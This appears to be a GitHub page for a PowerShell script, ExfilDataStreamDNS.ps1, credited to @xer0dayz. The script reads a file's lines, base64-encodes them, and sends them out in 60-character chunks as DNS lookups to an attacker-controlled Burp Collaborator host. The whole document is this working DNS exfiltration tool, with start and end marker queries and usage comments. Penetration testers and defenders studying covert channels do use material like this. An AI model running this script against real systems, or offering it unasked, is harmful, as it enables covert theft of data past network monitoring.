-
Notifications
You must be signed in to change notification settings - Fork 32
/
Copy pathExfilDataStreamDNS.ps1
43 lines (39 loc) · 1.54 KB
/
ExfilDataStreamDNS.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
# ExfilDataStreamDNS.ps1 by @xer0dayz - https://xerosecurity.com
#
# This script will exfil the entire contents of a file via base64 encoded strings to a custom DNS server.
#
# Update exfil.csv with the filename to exfil
# Update $dnsserver var with DNS server to use
#
$lines = Get-Content .\exfil.csv
$dnsserver = "yourhost.burpcollaborator.net"
foreach ($line in $lines){
echo "Line: $line"
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($line)
$EncodedText =[Convert]::ToBase64String($Bytes)
echo "EncodedText: $EncodedText"
$EncodedTextLength = $EncodedText.length
echo "EncodedTextLength: $EncodedTextLength"
$i = 0
$pos = 0
$buff = 60
echo "Start ==============================================="
nslookup start.$dnsserver | out-null 2> $null
While ($i -le $EncodedTextLength) {
$diff = $EncodedTextLength - $i
if($diff -lt $buff){
$EncodedTextStream = $EncodedText.substring($i,$diff)
}
if($diff -gt $buff-1){
$diff_end = $buff
$EncodedTextStreamSubString = $EncodedText.substring($i,$diff_end)
$EncodedTextStream = $EncodedTextStreamSubString
}
$EncodedTextStream = $EncodedTextStream -replace '=','00' 2> $null
echo "Full DNS: $EncodedTextStream.$dnsserver"
nslookup "$EncodedTextStream.$dnsserver" | out-null 2> $null
$i = $i+$buff
}
echo "End ==============================================="
nslookup end.$dnsserver | out-null 2> $null
}